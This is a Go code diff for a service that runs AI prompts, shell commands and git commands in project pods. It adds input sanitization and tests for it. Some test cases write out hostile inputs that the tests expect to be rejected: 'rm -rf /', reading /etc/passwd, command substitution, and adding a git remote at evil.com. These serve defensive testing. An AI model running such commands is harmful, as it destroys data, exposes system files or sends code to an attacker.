Name: "test-with-projects",
|
||||
Scopes: []string{"projects:read"},
|
||||
ProjectIDs: []string{"proj-a", "proj-b"},
|
||||
ExpiresIn: "90d",
|
||||
},
|
||||
wantStatus: http.StatusCreated,
|
||||
},
|
||||
{
|
||||
name: "never expires",
|
||||
body: CreateKeyRequest{
|
||||
Name: "test-never-expires",
|
||||
Scopes: []string{"admin"},
|
||||
ExpiresIn: "never",
|
||||
},
|
||||
wantStatus: http.StatusCreated,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
body, _ := json.Marshal(tt.body)
|
||||
req := httptest.NewRequest("POST", "/keys", bytes.NewReader(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != tt.wantStatus {
|
||||
t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
|
||||
}
|
||||
|
||||
if tt.wantErr != "" {
|
||||
if !strings.Contains(rec.Body.String(), tt.wantErr) {
|
||||
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
|
||||
}
|
||||
}
|
||||
|
||||
// For successful creates, verify the response structure
|
||||
if tt.wantStatus == http.StatusCreated {
|
||||
var resp map[string]any
|
||||
json.NewDecoder(bytes.NewReader(rec.Body.Bytes())).Decode(&resp)
|
||||
|
||||
data, _ := resp["data"].(map[string]any)
|
||||
if data["secret"] == nil || data["secret"] == "" {
|
||||
t.Error("Response should include secret")
|
||||
}
|
||||
if data["key"] == nil {
|
||||
t.Error("Response should include key object")
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestKeysHandler_Get(t *testing.T) {
|
||||
_, router, authService := setupKeysHandler(t)
|
||||
|
||||
// Create a key to get
|
||||
result, err := authService.Create(context.Background(), auth.CreateKeyRequest{
|
||||
Name: "test-handler-get",
|
||||
Scopes: []auth.Scope{auth.ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to create test key: %v", err)
|
||||
}
|
||||
|
||||
t.Run("existing key", func(t *testing.T) {
|
||||
req := httptest.NewRequest("GET", "/keys/"+result.Key.ID, nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusOK {
|
||||
t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String())
|
||||
}
|
||||
|
||||
var resp map[string]any
|
||||
json.NewDecoder(rec.Body).Decode(&resp)
|
||||
|
||||
data, _ := resp["data"].(map[string]any)
|
||||
if data["name"] != "test-handler-get" {
|
||||
t.Errorf("Name = %v, want test-handler-get", data["name"])
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("non-existent key", func(t *testing.T) {
|
||||
req := httptest.NewRequest("GET", "/keys/00000000-0000-0000-0000-000000000000", nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusNotFound {
|
||||
t.Errorf("Status = %d, want 404", rec.Code)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestKeysHandler_Revoke(t *testing.T) {
|
||||
_, router, authService := setupKeysHandler(t)
|
||||
|
||||
// Create a key to revoke
|
||||
result, err := authService.Create(context.Background(), auth.CreateKeyRequest{
|
||||
Name: "test-handler-revoke",
|
||||
Scopes: []auth.Scope{auth.ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to create test key: %v", err)
|
||||
}
|
||||
|
||||
t.Run("revoke existing key", func(t *testing.T) {
|
||||
req := httptest.NewRequest("DELETE", "/keys/"+result.Key.ID, nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusOK {
|
||||
t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String())
|
||||
}
|
||||
|
||||
var resp map[string]any
|
||||
json.NewDecoder(rec.Body).Decode(&resp)
|
||||
|
||||
data, _ := resp["data"].(map[string]any)
|
||||
if data["status"] != "revoked" {
|
||||
t.Errorf("Status = %v, want revoked", data["status"])
|
||||
}
|
||||
|
||||
// Verify the key is actually revoked
|
||||
_, err := authService.Validate(context.Background(), result.Secret)
|
||||
if err != auth.ErrKeyRevoked {
|
||||
t.Errorf("Key should be revoked, got err = %v", err)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("revoke non-existent key", func(t *testing.T) {
|
||||
req := httptest.NewRequest("DELETE", "/keys/00000000-0000-0000-0000-000000000000", nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusNotFound {
|
||||
t.Errorf("Status = %d, want 404", rec.Code)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestKeysHandler_InvalidJSON(t *testing.T) {
|
||||
_, router, _ := setupKeysHandler(t)
|
||||
|
||||
req := httptest.NewRequest("POST", "/keys", strings.NewReader("invalid json{"))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusBadRequest {
|
||||
t.Errorf("Status = %d, want 400", rec.Code)
|
||||
}
|
||||
|
||||
if !strings.Contains(rec.Body.String(), "Invalid JSON") {
|
||||
t.Errorf("Body = %q, want to contain 'Invalid JSON'", rec.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func TestApiKeyToResponse(t *testing.T) {
|
||||
now := time.Now()
|
||||
future := now.Add(24 * time.Hour)
|
||||
|
||||
key := &auth.APIKey{
|
||||
ID: "test-id",
|
||||
Name: "test-name",
|
||||
KeyPrefix: "rdev_sk_abc",
|
||||
Scopes: []auth.Scope{auth.ScopeProjectsRead, auth.ScopeProjectsExecute},
|
||||
ProjectIDs: []string{"proj-a"},
|
||||
CreatedAt: now,
|
||||
ExpiresAt: &future,
|
||||
LastUsedAt: &now,
|
||||
CreatedBy: "test-user",
|
||||
}
|
||||
|
||||
resp := apiKeyToResponse(key)
|
||||
|
||||
if resp.ID != "test-id" {
|
||||
t.Errorf("ID = %q, want test-id", resp.ID)
|
||||
}
|
||||
if resp.Name != "test-name" {
|
||||
t.Errorf("Name = %q, want test-name", resp.Name)
|
||||
}
|
||||
if len(resp.Scopes) != 2 {
|
||||
t.Errorf("Scopes length = %d, want 2", len(resp.Scopes))
|
||||
}
|
||||
if len(resp.ProjectIDs) != 1 {
|
||||
t.Errorf("ProjectIDs length = %d, want 1", len(resp.ProjectIDs))
|
||||
}
|
||||
if resp.ExpiresAt == nil {
|
||||
t.Error("ExpiresAt should not be nil")
|
||||
}
|
||||
if resp.LastUsedAt == nil {
|
||||
t.Error("LastUsedAt should not be nil")
|
||||
}
|
||||
if !resp.Active {
|
||||
t.Error("Active should be true")
|
||||
}
|
||||
}
|
||||
@ -13,6 +13,7 @@ import (
|
||||
"github.com/go-chi/chi/v5"
|
||||
"github.com/orchard9/rdev/internal/executor"
|
||||
"github.com/orchard9/rdev/internal/projects"
|
||||
"github.com/orchard9/rdev/internal/sanitize"
|
||||
"github.com/orchard9/rdev/pkg/api"
|
||||
)
|
||||
|
||||
@ -104,6 +105,18 @@ func (h *ProjectsHandler) RunClaude(w http.ResponseWriter, r *http.Request) {
|
||||
return
|
||||
}
|
||||
|
||||
// Sanitize prompt
|
||||
if err := sanitize.ClaudePrompt(req.Prompt); err != nil {
|
||||
api.WriteBadRequest(w, r, err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
// Validate stream ID
|
||||
if err := sanitize.StreamID(req.StreamID); err != nil {
|
||||
api.WriteBadRequest(w, r, err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
// Generate command ID
|
||||
cmdNum := h.cmdID.Add(1)
|
||||
cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum)
|
||||
@ -162,6 +175,18 @@ func (h *ProjectsHandler) RunShell(w http.ResponseWriter, r *http.Request) {
|
||||
return
|
||||
}
|
||||
|
||||
// Sanitize command - CRITICAL for security
|
||||
if err := sanitize.ShellCommand(req.Command); err != nil {
|
||||
api.WriteBadRequest(w, r, err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
// Validate stream ID
|
||||
if err := sanitize.StreamID(req.StreamID); err != nil {
|
||||
api.WriteBadRequest(w, r, err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
// Generate command ID
|
||||
cmdNum := h.cmdID.Add(1)
|
||||
cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum)
|
||||
@ -220,6 +245,18 @@ func (h *ProjectsHandler) RunGit(w http.ResponseWriter, r *http.Request) {
|
||||
return
|
||||
}
|
||||
|
||||
// Sanitize git args
|
||||
if err := sanitize.GitArgs(req.Args); err != nil {
|
||||
api.WriteBadRequest(w, r, err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
// Validate stream ID
|
||||
if err := sanitize.StreamID(req.StreamID); err != nil {
|
||||
api.WriteBadRequest(w, r, err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
// Generate command ID
|
||||
cmdNum := h.cmdID.Add(1)
|
||||
cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum)
|
||||
@ -403,3 +440,13 @@ func (sm *streamManager) Close(streamID string) {
|
||||
}
|
||||
delete(sm.streams, streamID)
|
||||
}
|
||||
|
||||
// Registry returns the project registry for use by other handlers.
|
||||
func (h *ProjectsHandler) Registry() *projects.Registry {
|
||||
return h.registry
|
||||
}
|
||||
|
||||
// Executor returns the executor for use by other handlers.
|
||||
func (h *ProjectsHandler) Executor() *executor.Executor {
|
||||
return h.executor
|
||||
}
|
||||
|
||||
464
internal/handlers/projects_test.go
Normal file
464
internal/handlers/projects_test.go
Normal file
@ -0,0 +1,464 @@
|
||||
package handlers
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/go-chi/chi/v5"
|
||||
)
|
||||
|
||||
// TestProjectsHandler_List tests the List endpoint.
|
||||
func TestProjectsHandler_List(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
req := httptest.NewRequest("GET", "/projects", nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusOK {
|
||||
t.Errorf("Status = %d, want 200", rec.Code)
|
||||
}
|
||||
|
||||
var resp map[string]any
|
||||
if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
|
||||
t.Fatalf("Failed to decode response: %v", err)
|
||||
}
|
||||
|
||||
if _, ok := resp["data"]; !ok {
|
||||
t.Error("Response missing 'data' field")
|
||||
}
|
||||
|
||||
if _, ok := resp["meta"]; !ok {
|
||||
t.Error("Response missing 'meta' field")
|
||||
}
|
||||
}
|
||||
|
||||
// TestProjectsHandler_Get tests the Get endpoint.
|
||||
func TestProjectsHandler_Get(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
projectID string
|
||||
wantStatus int
|
||||
}{
|
||||
{"existing project", "pantheon", http.StatusOK},
|
||||
{"non-existent project", "nonexistent", http.StatusNotFound},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
req := httptest.NewRequest("GET", "/projects/"+tt.projectID, nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != tt.wantStatus {
|
||||
t.Errorf("Status = %d, want %d", rec.Code, tt.wantStatus)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestProjectsHandler_RunClaude tests the RunClaude endpoint.
|
||||
func TestProjectsHandler_RunClaude(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
projectID string
|
||||
body any
|
||||
wantStatus int
|
||||
wantErr string
|
||||
}{
|
||||
{
|
||||
name: "valid request",
|
||||
projectID: "pantheon",
|
||||
body: ClaudeRequest{
|
||||
Prompt: "Hello, world!",
|
||||
},
|
||||
wantStatus: http.StatusCreated,
|
||||
},
|
||||
{
|
||||
name: "missing prompt",
|
||||
projectID: "pantheon",
|
||||
body: ClaudeRequest{
|
||||
Prompt: "",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "prompt is required",
|
||||
},
|
||||
{
|
||||
name: "project not found",
|
||||
projectID: "nonexistent",
|
||||
body: ClaudeRequest{Prompt: "test"},
|
||||
wantStatus: http.StatusNotFound,
|
||||
},
|
||||
{
|
||||
name: "null byte in prompt",
|
||||
projectID: "pantheon",
|
||||
body: ClaudeRequest{
|
||||
Prompt: "Hello\x00World",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "null byte",
|
||||
},
|
||||
{
|
||||
name: "invalid stream ID",
|
||||
projectID: "pantheon",
|
||||
body: ClaudeRequest{
|
||||
Prompt: "Hello",
|
||||
StreamID: "invalid stream id with spaces",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "alphanumeric",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
body, _ := json.Marshal(tt.body)
|
||||
req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/claude", bytes.NewReader(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != tt.wantStatus {
|
||||
t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
|
||||
}
|
||||
|
||||
if tt.wantErr != "" {
|
||||
if !strings.Contains(rec.Body.String(), tt.wantErr) {
|
||||
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestProjectsHandler_RunShell tests the RunShell endpoint.
|
||||
func TestProjectsHandler_RunShell(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
projectID string
|
||||
body any
|
||||
wantStatus int
|
||||
wantErr string
|
||||
}{
|
||||
{
|
||||
name: "valid command",
|
||||
projectID: "pantheon",
|
||||
body: ShellRequest{
|
||||
Command: "ls -la",
|
||||
},
|
||||
wantStatus: http.StatusCreated,
|
||||
},
|
||||
{
|
||||
name: "missing command",
|
||||
projectID: "pantheon",
|
||||
body: ShellRequest{
|
||||
Command: "",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "command is required",
|
||||
},
|
||||
{
|
||||
name: "dangerous command with semicolon",
|
||||
projectID: "pantheon",
|
||||
body: ShellRequest{
|
||||
Command: "ls; rm -rf /",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "command chaining",
|
||||
},
|
||||
{
|
||||
name: "dangerous command with pipe",
|
||||
projectID: "pantheon",
|
||||
body: ShellRequest{
|
||||
Command: "cat /etc/passwd | grep root",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "command chaining",
|
||||
},
|
||||
{
|
||||
name: "command substitution",
|
||||
projectID: "pantheon",
|
||||
body: ShellRequest{
|
||||
Command: "echo $(whoami)",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "command chaining",
|
||||
},
|
||||
{
|
||||
name: "redirect",
|
||||
projectID: "pantheon",
|
||||
body: ShellRequest{
|
||||
Command: "ls > /tmp/out.txt",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "redirect",
|
||||
},
|
||||
{
|
||||
name: "rm rf root",
|
||||
projectID: "pantheon",
|
||||
body: ShellRequest{
|
||||
Command: "rm -rf /",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "destructive rm",
|
||||
},
|
||||
{
|
||||
name: "project not found",
|
||||
projectID: "nonexistent",
|
||||
body: ShellRequest{Command: "ls"},
|
||||
wantStatus: http.StatusNotFound,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
body, _ := json.Marshal(tt.body)
|
||||
req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/shell", bytes.NewReader(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != tt.wantStatus {
|
||||
t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
|
||||
}
|
||||
|
||||
if tt.wantErr != "" {
|
||||
if !strings.Contains(rec.Body.String(), tt.wantErr) {
|
||||
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestProjectsHandler_RunGit tests the RunGit endpoint.
|
||||
func TestProjectsHandler_RunGit(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
projectID string
|
||||
body any
|
||||
wantStatus int
|
||||
wantErr string
|
||||
}{
|
||||
{
|
||||
name: "valid git status",
|
||||
projectID: "pantheon",
|
||||
body: GitRequest{
|
||||
Args: []string{"status"},
|
||||
},
|
||||
wantStatus: http.StatusCreated,
|
||||
},
|
||||
{
|
||||
name: "valid git log",
|
||||
projectID: "pantheon",
|
||||
body: GitRequest{
|
||||
Args: []string{"log", "--oneline", "-10"},
|
||||
},
|
||||
wantStatus: http.StatusCreated,
|
||||
},
|
||||
{
|
||||
name: "missing args",
|
||||
projectID: "pantheon",
|
||||
body: GitRequest{
|
||||
Args: []string{},
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "args is required",
|
||||
},
|
||||
{
|
||||
name: "git config blocked",
|
||||
projectID: "pantheon",
|
||||
body: GitRequest{
|
||||
Args: []string{"config", "--global", "user.name", "attacker"},
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "git config",
|
||||
},
|
||||
{
|
||||
name: "git remote blocked",
|
||||
projectID: "pantheon",
|
||||
body: GitRequest{
|
||||
Args: []string{"remote", "add", "evil", "https://evil.com/repo"},
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "git remote",
|
||||
},
|
||||
{
|
||||
name: "force push blocked",
|
||||
projectID: "pantheon",
|
||||
body: GitRequest{
|
||||
Args: []string{"push", "-f", "origin", "main"},
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "force push",
|
||||
},
|
||||
{
|
||||
name: "project not found",
|
||||
projectID: "nonexistent",
|
||||
body: GitRequest{Args: []string{"status"}},
|
||||
wantStatus: http.StatusNotFound,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
body, _ := json.Marshal(tt.body)
|
||||
req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/git", bytes.NewReader(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != tt.wantStatus {
|
||||
t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
|
||||
}
|
||||
|
||||
if tt.wantErr != "" {
|
||||
if !strings.Contains(rec.Body.String(), tt.wantErr) {
|
||||
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestProjectsHandler_Events tests the Events SSE endpoint.
|
||||
func TestProjectsHandler_Events(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
// Note: SSE tests with headers are difficult in httptest because the
|
||||
// handler blocks waiting for events. We test what we can without blocking.
|
||||
|
||||
t.Run("project not found", func(t *testing.T) {
|
||||
req := httptest.NewRequest("GET", "/projects/nonexistent/events", nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusNotFound {
|
||||
t.Errorf("Status = %d, want 404", rec.Code)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// TestProjectsHandler_InvalidJSON tests handling of invalid JSON bodies.
|
||||
func TestProjectsHandler_InvalidJSON(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
endpoints := []struct {
|
||||
method string
|
||||
path string
|
||||
}{
|
||||
{"POST", "/projects/pantheon/claude"},
|
||||
{"POST", "/projects/pantheon/shell"},
|
||||
{"POST", "/projects/pantheon/git"},
|
||||
}
|
||||
|
||||
for _, ep := range endpoints {
|
||||
t.Run(ep.path, func(t *testing.T) {
|
||||
req := httptest.NewRequest(ep.method, ep.path, strings.NewReader("invalid json{"))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusBadRequest {
|
||||
t.Errorf("Status = %d, want 400. Body: %s", rec.Code, rec.Body.String())
|
||||
}
|
||||
|
||||
if !strings.Contains(rec.Body.String(), "invalid") {
|
||||
t.Errorf("Body = %q, want to contain 'invalid'", rec.Body.String())
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestCommandIDGeneration tests that command IDs are generated correctly.
|
||||
func TestCommandIDGeneration(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
// Send two requests and verify they get different command IDs
|
||||
body := ClaudeRequest{Prompt: "test"}
|
||||
bodyBytes, _ := json.Marshal(body)
|
||||
|
||||
req1 := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes))
|
||||
req1.Header.Set("Content-Type", "application/json")
|
||||
rec1 := httptest.NewRecorder()
|
||||
router.ServeHTTP(rec1, req1)
|
||||
|
||||
req2 := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes))
|
||||
req2.Header.Set("Content-Type", "application/json")
|
||||
rec2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(rec2, req2)
|
||||
|
||||
// Parse both responses
|
||||
var resp1, resp2 map[string]any
|
||||
json.NewDecoder(bytes.NewReader(rec1.Body.Bytes())).Decode(&resp1)
|
||||
json.NewDecoder(bytes.NewReader(rec2.Body.Bytes())).Decode(&resp2)
|
||||
|
||||
data1, _ := resp1["data"].(map[string]any)
|
||||
data2, _ := resp2["data"].(map[string]any)
|
||||
|
||||
if data1["id"] == data2["id"] {
|
||||
t.Error("Two requests should have different command IDs")
|
||||
}
|
||||
}
|
||||
|
||||
// TestCustomStreamID tests that custom stream IDs are used when provided.
|
||||
func TestCustomStreamID(t *testing.T) {
|
||||
h := NewProjectsHandler()
|
||||
router := chi.NewRouter()
|
||||
h.Mount(router)
|
||||
|
||||
body := ClaudeRequest{
|
||||
Prompt: "test",
|
||||
StreamID: "my-custom-stream-id",
|
||||
}
|
||||
bodyBytes, _ := json.Marshal(body)
|
||||
|
||||
req := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
rec := httptest.NewRecorder()
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
var resp map[string]any
|
||||
json.NewDecoder(rec.Body).Decode(&resp)
|
||||
|
||||
data, _ := resp["data"].(map[string]any)
|
||||
|
||||
if data["id"] != "my-custom-stream-id" {
|
||||
t.Errorf("Command ID = %v, want my-custom-stream-id", data["id"])
|
||||
}
|
||||
}
|
||||
28
internal/port/apikey_repository.go
Normal file
28
internal/port/apikey_repository.go
Normal file
@ -0,0 +1,28 @@
|
||||
package port
|
||||
|
||||
import (
|
||||
"context"
|
||||
|
||||
"github.com/orchard9/rdev/internal/domain"
|
||||
)
|
||||
|
||||
// APIKeyRepository defines operations for managing API keys.
|
||||
type APIKeyRepository interface {
|
||||
// Create stores a new API key.
|
||||
Create(ctx context.Context, key *domain.APIKey, keyHash string) error
|
||||
|
||||
// GetByHash retrieves an API key by its hash.
|
||||
GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error)
|
||||
|
||||
// Get retrieves an API key by ID.
|
||||
Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error)
|
||||
|
||||
// List returns all API keys (without secrets).
|
||||
List(ctx context.Context) ([]*domain.APIKey, error)
|
||||
|
||||
// Revoke marks an API key as revoked.
|
||||
Revoke(ctx context.Context, id domain.APIKeyID) error
|
||||
|
||||
// UpdateLastUsed updates the last used timestamp for a key.
|
||||
UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error
|
||||
}
|
||||
22
internal/port/command_executor.go
Normal file
22
internal/port/command_executor.go
Normal file
@ -0,0 +1,22 @@
|
||||
package port
|
||||
|
||||
import (
|
||||
"context"
|
||||
|
||||
"github.com/orchard9/rdev/internal/domain"
|
||||
)
|
||||
|
||||
// CommandExecutor defines operations for executing commands in pods.
|
||||
type CommandExecutor interface {
|
||||
// Execute runs a command in the target pod and streams output to the handler.
|
||||
Execute(ctx context.Context, cmd *domain.Command, podName string, handler domain.OutputHandler) (*domain.CommandResult, error)
|
||||
|
||||
// Cancel attempts to cancel a running command.
|
||||
Cancel(ctx context.Context, cmdID domain.CommandID) error
|
||||
|
||||
// PodExists checks if a pod exists and is running.
|
||||
PodExists(ctx context.Context, podName string) (bool, error)
|
||||
|
||||
// CheckConnection verifies connectivity to the Kubernetes cluster.
|
||||
CheckConnection(ctx context.Context) error
|
||||
}
|
||||
31
internal/port/project_repository.go
Normal file
31
internal/port/project_repository.go
Normal file
@ -0,0 +1,31 @@
|
||||
// Package port defines interfaces (ports) for external dependencies.
|
||||
// These interfaces define the contracts between the application core and
|
||||
// infrastructure adapters, enabling testability and flexibility.
|
||||
package port
|
||||
|
||||
import (
|
||||
"context"
|
||||
|
||||
"github.com/orchard9/rdev/internal/domain"
|
||||
)
|
||||
|
||||
// ProjectRepository defines operations for managing projects.
|
||||
type ProjectRepository interface {
|
||||
// List returns all available projects.
|
||||
List(ctx context.Context) ([]domain.Project, error)
|
||||
|
||||
// Get returns a project by ID.
|
||||
Get(ctx context.Context, id domain.ProjectID) (*domain.Project, error)
|
||||
|
||||
// Exists checks if a project exists.
|
||||
Exists(ctx context.Context, id domain.ProjectID) (bool, error)
|
||||
|
||||
// Register adds a new project to the repository.
|
||||
Register(ctx context.Context, project *domain.Project) error
|
||||
|
||||
// Unregister removes a project from the repository.
|
||||
Unregister(ctx context.Context, id domain.ProjectID) error
|
||||
|
||||
// RefreshStatus updates the status of all projects.
|
||||
RefreshStatus(ctx context.Context) error
|
||||
}
|
||||
20
internal/port/stream_publisher.go
Normal file
20
internal/port/stream_publisher.go
Normal file
@ -0,0 +1,20 @@
|
||||
package port
|
||||
|
||||
// StreamEvent represents an event to be published on a stream.
|
||||
type StreamEvent struct {
|
||||
Type string
|
||||
Data map[string]any
|
||||
}
|
||||
|
||||
// StreamPublisher defines operations for managing SSE event streams.
|
||||
type StreamPublisher interface {
|
||||
// Subscribe creates a subscription to events for the given stream ID.
|
||||
// Returns a channel that will receive events and a cleanup function.
|
||||
Subscribe(streamID string) (<-chan StreamEvent, func())
|
||||
|
||||
// Publish sends an event to all subscribers of a stream.
|
||||
Publish(streamID string, event StreamEvent)
|
||||
|
||||
// Close closes a stream and all its subscriptions.
|
||||
Close(streamID string)
|
||||
}
|
||||
272
internal/ratelimit/ratelimit.go
Normal file
272
internal/ratelimit/ratelimit.go
Normal file
@ -0,0 +1,272 @@
|
||||
// Package ratelimit provides rate limiting middleware for HTTP handlers.
|
||||
package ratelimit
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/orchard9/rdev/internal/auth"
|
||||
"github.com/orchard9/rdev/pkg/api"
|
||||
)
|
||||
|
||||
// Config defines rate limit parameters.
|
||||
type Config struct {
|
||||
// RequestsPerMinute is the average rate limit.
|
||||
RequestsPerMinute int
|
||||
|
||||
// BurstSize is the maximum number of requests allowed in a burst.
|
||||
// Defaults to RequestsPerMinute / 2 if not set.
|
||||
BurstSize int
|
||||
|
||||
// CleanupInterval is how often to clean up stale entries.
|
||||
// Defaults to 5 minutes.
|
||||
CleanupInterval time.Duration
|
||||
|
||||
// KeyFunc extracts the rate limit key from a request.
|
||||
// Defaults to using the API key ID from context.
|
||||
KeyFunc func(*http.Request) string
|
||||
}
|
||||
|
||||
